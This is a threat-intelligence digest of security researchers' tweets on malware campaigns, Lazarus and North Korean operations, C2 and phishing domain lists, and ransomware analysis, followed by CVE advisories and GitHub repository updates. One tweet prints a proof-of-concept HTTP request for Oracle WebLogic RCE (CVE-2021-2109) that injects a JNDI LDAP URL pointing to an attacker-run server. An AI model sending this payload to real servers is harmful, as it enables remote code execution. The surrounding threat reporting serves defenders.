virusbtn: CSIS researchers and regular VB conference speaker @benkow_ analysed the affiliate model behind the Nemty ransomware, which ceased operations last spring https://t.co/EusO267VPW https://t.co/8OL0FgNGTk
virusbtn: Security researchers continue to study the SUNBURST malware campaign. @VriesHD has decrypted tens of thousands of subdomains used in the campaign https://t.co/ExLsOCsLi2 https://t.co/Q5DDSa4d1C
MITREattack: Don't forget to join @jamieantisocial & @redcanary today at 1PM ET for a 30-minute live event (and interactive detection challenge!) covering strategies for understanding and detecting adversary WMI-abuse. Sign up at https://t.co/DNorrnSDU4! https://t.co/QwQYCUcoob
SpecterOps: CORRECTION: We are hosting our Red Team Operations (Mar 23-26), Vulnerability Research for Operators (Mar 29-30), and Mac Tradecraft (Mar 31-Apr 1) courses coming up soon. Sign-up links are available here: https://t.co/vgSHK78qaI
TalosSecurity: Talos Takes is back after our winter break! We return with a new episode covering the basics of supply chain attacks and how this isn't the first, nor the last, after #SolarWinds https://t.co/c3tHaU5uQF https://t.co/xFTXHTwtYv
TalosSecurity: We know it's hard to look at any news that's related to Washington at this point, but that doesn't mean the cyber world was quiet this week. Catch up on everything with the Threat Source newsletter https://t.co/MXx8Mf7rTS https://t.co/IewgxUqGRo
TalosSecurity: We are hiring for several positions across different Talos teams. Check out our Careers page (and come back regularly for new postings) to join our groundbreaking organization https://t.co/Z3we6oy6zE https://t.co/3oNSXVfHIV
anyrun_app: TOP10 last week's threats by uploads ⬆️ #Emotet 1547 (954) ⬇️ #NjRAT 282 (320) ⬆️ #FormBook 206 (161) ⬆️ #Remcos 157 (134) ⬆️ #Nanocore 142 (124) ⬆️ #Lokibot 135 (129) ⬆️ #AgentTesla 102 (77) ⬆️ #AsyncRAT 101 (97) ⬆️ #Dridex 97 (39) ⬇️ #Redline 49 (79) https://t.co/98nRpXOxWw
abuse_ch: Did you know that the U.S. 🇺🇸 is hosting most of the active Emotet malware sites worldwide and that Google Cloud is responsible for 17% of those? Time to clean up the mess! 🧹🪲 👉 https://t.co/DSARIaelFA https://t.co/ftqnfykGYW
QuoIntelligence: Read about #Malwarebytes #supplychain attack & its significant connection to the #SolarWinds breach. Besides, we've noticed a worldwide increased effort on developing frameworks for supply chain security & resilience. More here: https://t.co/Xbg91ZStOL
JAMESWT_MHT: #VelvetSweatshop Xlsx caught today by @abuse_ch https://t.co/PlK3iJ1roi Spread #Formbook /#Lokibot Urls https://t.co/IDTZ2Z7DDc https://t.co/sOAOvy85Rd Run https://t.co/mOISorT1B6 https://t.co/UXJ02mnDdN cc @malwrhunterteam @verovaleros @lazyactivist192 @Jan0fficial @cocaman https://t.co/0yLlpG2Nt4
cyb3rops: @campuscodi Advice: Don’t accept direct messages from everyone - it turns down the noise and makes them ask you in public to follow them back (which I use for a short background check; number of followers, LinkedIn history and connections etc.) https://t.co/CsiZ2CpKFv
RedDrip7: Seems another sample from #Lazarus Group with invalid sig "2 TOY GUYS LLC". In September 2020, we disclosed a #Lazarus campaign which used the same C2: www[.]fabioluciani[.]com Our Report: https://t.co/SgubBJK3Mo https://t.co/zuGqAbVJ5I https://t.co/m3kPoQU5mz https://t.co/2zpcRZ6ksh
blackorbird: #Lazarus Campaign Targeting Security Researchers #APT #SocialEngineering "dxgkrnl_poc" Visual Studio Project Analysis Report: 1. https://t.co/0eoRRQQIi5 2. https://t.co/0qomqY69hO Attribution: https://t.co/XMlkH0Vp0r ref: https://t.co/kLizS9Kuo4 https://t.co/uIsE4JKAvp
wugeej: #Oracle WebLogic Server RCE (CVE-2021-2109) [PoC] GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;[Semicolon]👈10:1389/5r5mu7;AdminServer-) https://t.co/S875IxhzFa https://t.co/h2REYhG9Yj
malware_traffic: 2021-01-25 (Monday) - More #TA551 (#shathak) Word docs pushing #Qakbot, so I guess this actor has given up on IcedID. Doc: https://t.co/9UxwNpdM5j DLL: https://t.co/IpV2JosPA5 https://t.co/4kKU2B829g
malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so I couldn't open the attached zip archive. LOL, Ivan! - Message available at: https://t.co/fueJRpOwp0 https://t.co/o6BBA3qcKf
malware_traffic: @secprentice That's why I do it. I have the message chains on email clients on the hosts I infect with Emotet. Emotet then exports that data out to the botnet. That data is used to create fake replies to the stolen Emotet chains. https://t.co/scm3iHZQGI
malware_traffic: 2021-01-22 (Friday) - #TA551 (#shathak) is back for the new year, but now it's pushing #Qakbot (#Qbot) malware instead of IcedID - Paste of info: https://t.co/JxQsmPI8sK - Pastebin raw: https://t.co/nwuRClgacw https://t.co/mALRcnIecE
malware_traffic: 2021-01-22 (Friday) - #Emotet #epoch1 infection with #spambot activity - Still working on sanitizing/carving traffic for the #pcap(s), but I exported 41 emails from unencrypted SMTP traffic and posted them at https://t.co/7CSK1hyqMX - I'll update that blog post if I have time. https://t.co/IucQ9FYw9Z
demonslay335: @GrujaRS Just wow... so it's _basically_ based on HiddenTear with a twist: they encrypt files with AES, then AGAIN with an attempt at what they call a "custom RC4" implementation that uses a larger state matrix. https://t.co/XqwJ2r5mkO
VK_Intel: 2021-01-25:🆕#REvil #Ransomware Debug Version 2.0.3 Jan 11, 2021 "ver":515,"sub":"6545" 1⃣To reach more target files for encryption: SetEveryoneAccess(...)➡️SetEntriesInAcl(...) API 2⃣'FakeGetProcAddress' to get the address of an exported function from DLL h/t @malwrhunterteam https://t.co/OHJhPCdn8i
securitydoggo: Picking everyone's brain: what are your must-have #EDR features? Aside from the obvious, an easy to use querying system across all endpoints would be #1 for me. #cyber #infosec #endpoints
DrunkBinary: @BrianPKime @likethecoins @rickhholland @NicoleBeckwith @Ch33r10 @TheVega @jfslowik @Dragonkin37 @RobertMLee @selenalarson @asfakian Samesies, there will always be next year...and DISC https://t.co/T9FAQxRXWU
ShadowChasing1: Another sample of this campaign which belongs to #Lazarus #APT group ITW: 7FC2AF97B004836C5452922D4491BAAA filename: Browse .VC.db C2: angeldonationblog[.]com https://t.co/77efJjnmm3 https://t.co/lBDOdZchq5
ItsReallyNick: @devinmclean @SteveSyfuhs @CISAgov Should you still want to sift for evil based on the lower fidelity UserAuthenticationMethod 16457, we proposed some Solorigate TTP-specific mods: https://t.co/y4KrIOHL00 I understand the Azure AD method flags aren’t in UAL (or MCAS or Sentinel) events after Oct 31, 2020 anyway🤷🏻♂️ https://t.co/NPdpEq8p15
cyberwar_15: #북한 #NorthKorea #Naver #Hanmail #CyberWar North Korean cyber operatives, when attacking South Korean users, configure their attacks differently depending on whether the target uses Naver or Hanmail. The two servers are as follows. Please block both of them. Naver: naver.servehttp[.]com Hanmail: attach.ddns[.]net https://t.co/zG5Rr5OBDi
issuemakerslab: In 2016, the South Korean military was occupied by North Korea's cyberattacks. At that time, the head of the cyber center was disciplined for failing to prevent the attack. He sued and won the case for unfairness. https://t.co/iutxgQjVPo
issuemakerslab: North Korea's RGB-D5 is still successful in spear-phishing attacks in the new year. They make up many phishing servers and are attacking various victims in South Korea. https://t.co/zlNeNoHqNB
IntezerLabs: Samples from a recent @Google report about NK campaign targeting security researchers (including 0day vulnerabilities) share code with previous FALLCHILL samples 🇰🇵 https://t.co/31gST672QN https://t.co/Tn84N8VWcH
IntezerLabs: 🐧 Rekoobe [d35657a79c7e0d3ab1fe589f5e8088a1] 🐧 XMRig Miner [befa8b0959809739a6a52bdf9836c8e4] 🐧 Mirai [de1bbb1e4a94de0d047673adaed080c1] 3 Linux threats missed by most security solutions. Get next week's full list of hashes sent to your inbox https://t.co/oTPk2j490C https://t.co/eK13zVfrt1
aboutsecurity: Check out our 1st #SOCWise #LinkedInLive session (15 mins) on supply chain attacks, along with practical advice on how #Blueteam & #AllAroundDefenders can spot the presence of the adversary looking at behaviors across the attack timeline: https://t.co/S5pTXlWrSi #MCFE #McAfee https://t.co/y2UUpKFF5z
kyleehmke: Another set from earlier in January: drive-dwn[.]com (108.62.12[.]186) drive-upd[.]com (108.62.12[.]187) drive1upd[.]com (108.62.12[.]162) drive1update[.]com (108.62.12[.]184) service-boosts[.]com (108.62.12[.]209)...
kyleehmke: backup-updates[.]com (23.106.160[.]205) backup1-online[.]com (23.106.160[.]188) backup1patch[.]com (23.106.160[.]35) servicepatcher[.]com (23.106.160[.]37) topserviceboost[.]com (23.106.160[.]220) topserviceupdate[.]com (23.106.160[.]29) backupupdonline[.]com (4/5)
kyleehmke: best-serviceupd[.]com (194.26.29[.]248) backupupd[.]com (194.26.29[.]247) backupsec[.]com (194.26.29[.]246) backup-boost[.]com (23.106.160[.]233) backup-helps[.]com (23.106.160[.]185) backup-monster[.]com (23.106.160[.]209) backup-updater[.]com (23.106.160[.]234) (3/5)
DissectMalware: With a little hack, #xlmdeobfuscator can now #deobfuscate the latest #zloader docs with ease (not pushed) Spent hours & hours to deobfuscate recent samples manually, find bugs in the emulator, and fix them. Stay tuned 4 xlmdeobfuscator v0.1.7 Video: https://t.co/DeEBdMcTBf https://t.co/swbeoYP0Qa
DissectMalware: @cocaman @ffforward @JAMESWT_MHT @James_inthe_box @lazyactivist192 @GossiTheDog Two layers of XLM macro obfuscation I manually deobfuscated the macro, you can find it here: https://t.co/XMlffT0Tzg Dumps vba: C08AFD90-F2A1-11D1-8455-00A0C91F3880 -> ShellBrowserWindow ShellBrowserWindow.Document.Application.ShellExecute https://t.co/RPpO0wkJuu
Hexacorn: @richinseattle @z0x55g that sys has a time stamp 2020-09-18 22:53:15 (Friday) it's been a while then ? and from cursory check - rc4 key (one of, as there seem to be some in the Registry?)? v24 = 0x8C2DB7B6; v24 = 0xDF145F6B; v24 = 0x73A138B1; v24 = 0xC4D2C189;
JCyberSec_: @peterkruse @ffforward @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 Can you DM me a link to your presentation please. I'd be very interested to take a read. Thanks!
JCyberSec_: @ffforward @peterkruse @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 I'd agree. Ex-Rob uses a : after the authoriseID parameter. The fingerprint isn't the same with this kit.
3xp0rtblog: @Bank_Security I find it funny to see when Cyber Intelligence companies are searching for workers with native English and Russian in the kit. It's so ridiculous. About Russian: Russian is versatile, therefore emulating it is very hard.
----Vulners.com High Sev. Last 3 Days----
----NVD Last 3 Days----
CVE#: CVE-2020-17532 Published Date: 2021-01-25 CVSS: NO CVSS Description: When handler-router component is enabled in servicecomb-java-chassis, authenticated user may inject some data and cause arbitrary code execution.
The problem happens in versions between 2.0.0 ~ 2.1.3 and fixed in Apache ServiceComb-Java-Chassis 2.1.5
CVE#: CVE-2021-21272 Published Date: 2021-01-25 CVSS: NO CVSS Description: ORAS is open source software which enables a way to push OCI Artifacts to OCI Conformant registries. ORAS is both a CLI for initial testing and a Go Module.
In ORAS from version 0.4.0 and before version 0.9.0, there is a "zip-slip" vulnerability.
The directory support feature allows the downloaded gzipped tarballs to be automatically extracted to the user-specified directory where the tarball can have symbolic links and hard links.
A well-crafted tarball or tarballs allow malicious artifact providers to link, write, or overwrite specific files on the host filesystem outside of the user-specified directory unexpectedly, with the same permissions as the user who runs `oras pull`.
Users of the affected versions are impacted if they are `oras` CLI users who run `oras pull`, or if they are Go programs which invoke `github.com/deislabs/oras/pkg/content.FileStore`.
The problem has been fixed in version 0.9.0.
For `oras` CLI users, there are no workarounds other than pulling from a trusted artifact provider.
For `oras` package users, the workaround is to not use `github.com/deislabs/oras/pkg/content.FileStore`, and use other content stores instead, or pull from a trusted artifact provider.
CVE#: CVE-2021-21275 Published Date: 2021-01-25 CVSS: NO CVSS Description: The MediaWiki "Report" extension has a Cross-Site Request Forgery (CSRF) vulnerability. Before the fixed version, there were no CSRF checks on Special:Report, so requests to report a revision could be forged.
The problem has been fixed in commit f828dc6 by making use of MediaWiki edit tokens.
CVE#: CVE-2021-23901 Published Date: 2021-01-25 CVSS: NO CVSS Description: An XML external entity (XXE) injection vulnerability was discovered in the Nutch DmozParser and is known to affect Nutch versions < 1.18. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Nutch 1.18.
InfoSec_Pom: Free Threat Intelligence feed - https://t.co/q1yOWjgK9G https://t.co/qpXvekqf8u The U.S. wants smartphone location… https://t.co/dqN5pELdkW
Sushreesatarupa updated corona_cARe.github.io. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-08. --- TechTogether Boston-WINNER-echoAR Best AR/VR hack-Interactive AR based COVID statistics and information providing web-app with an addictive covid game
dead-hosts updated The-Big-List-of-Hacked-Malware-Web-Sites_git_mitchellkrogza. This repo has 6 stars and 2 watchers. This repo was created on 2018-01-10. --- Test of https://github.com/mitchellkrogza/The-Big-List-of-Hacked-Malware-Web-Sites
carlospolop updated hacktricks. This repo has 1744 stars and 99 watchers. This repo was created on 2020-07-15. --- Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.
avinashkranjan updated Recess. This repo has 0 stars and 1 watchers. This repo was created on 2020-09-05. --- 🚀 MLH- First Day Back Hacks Hackathon... 🤓 Recess - A Social Media Platform for students to share their experience/knowledge they gained in their free time. 🧐
danielebruneo updated remarkable2-hacks. This repo has 8 stars and 2 watchers. This repo was created on 2021-01-25. --- A collection of hacks, mods, tools, tips & tricks, specifically focused on the Remarkable 2
w1th0ut updated red-ocean. This repo has 1 stars and 0 watchers. This repo was created on 2019-05-18. --- This is my first program, for simple hacking activity, made by simple python2 code, hope you enjoy :)
mozilla updated foundation-security-advisories. This repo has 12 stars and 21 watchers. This repo was created on 2014-07-03. --- Canonical source for Mozilla Foundation Security Advisories. http://www.mozilla.org/security/announce/
ZestProjects updated linux. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-26. --- Zest Projects' fork of the Linux kernel. Full LLVM build support is included with patches for features such as Zero Stack Initialisation and Polly, along with improvements to performance and security.
pucherot updated Pi.Alert. This repo has 124 stars and 14 watchers. This repo was created on 2021-01-05. --- WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also warns of the disconnection of "always connected" devices
arkime updated arkime. This repo has 4586 stars and 362 watchers. This repo was created on 2012-07-06. --- Arkime (formerly Moloch) is an open source, large scale, full packet capturing, indexing, and database system.
Mixeway updated MixewayFrontend. This repo has 4 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is a security orchestrator for vulnerability scanners which enables easy plug-in integration with CI/CD pipelines. MixewayFrontend contains the source code of the GUI, created in Angular 8 and based on the ngx-admin framework.
Mixeway updated MixewayBackend. This repo has 8 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is a security orchestrator for vulnerability scanners which enables easy plug-in integration with CI/CD pipelines. The MixewayBackend project contains the source code of the backend with all plugin integrations, written in Spring Boot.
SHolzhauer updated elastic-tip. This repo has 11 stars and 3 watchers. This repo was created on 2020-10-10. --- Elastic TIP is a python tool which automates the process of aggregating Threat Intelligence and ingesting the intelligence into a common format into Elasticsearch with the main goal of being used by the Security solution.
vituperative updated i2pplus. This repo has 1 stars and 1 watchers. This repo was created on 2020-06-12. --- I2P+ is a soft-fork of the Java I2P Anonymizing Network Layer - this is a mirror of https://gitlab.com/i2pplus/I2P.Plus/
OpenZeppelin updated openzeppelin-contracts. This repo has 9049 stars and 470 watchers. This repo was created on 2016-08-01. --- OpenZeppelin Contracts is a library for secure smart contract development.
github updated codeql. This repo has 1947 stars and 81 watchers. This repo was created on 2018-07-31. --- CodeQL: the libraries and queries that power security researchers around the world, as well as code scanning in GitHub Advanced Security (code scanning), LGTM.com, and LGTM Enterprise
Skyscanner updated cfripper. This repo has 258 stars and 10 watchers. This repo was created on 2018-07-02. --- Library and CLI tool for analysing CloudFormation templates and checking them for security compliance.
codesandtags updated poc-blog. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- This is a Proof of Concept, about how to create microservices using NodeJS, Express and React. This project contains a monorepo which represents the microservices to manage a blog website.
swiss-territorial-data-lab updated regbl-poc-analysis. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-21. --- Analysis script and tools for the proof of concept for the Registry of building (RegBL) completion
Ch-sriram updated node-js-deno. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- Proof of Concept: NodeJS & Deno. Repository contains concepts and code related to Node JS [Vanilla Node, Express Framework, REST APIs, GraphQL, Websockets & more] & Deno.
swissarmysam updated signal-nui. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- A proof-of-concept natural user interface (NUI) using hand gestures and voice to control a video streaming website.
joshuajung updated 116117bot. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- A proof of concept bot, checking impfterminservice.de for available COVID-19 vaccination appointments.
contriteobserver updated RajawaliAssimpBridge. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- A proof of concept integration between Rajawali and the Open Asset (Assimp) Import Library
EticaAI updated HXL-Data-Science-file-formats. This repo has 2 stars and 2 watchers. This repo was created on 2021-01-24. --- [public draft][Proof of concept] Common file formats used for Data Science exported from HXL (The Humanitarian Exchange Language)
jzohdi updated image-upload-poc. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- This is a proof of concept project where a user will be able to create an image gallery accepting real time image uploads.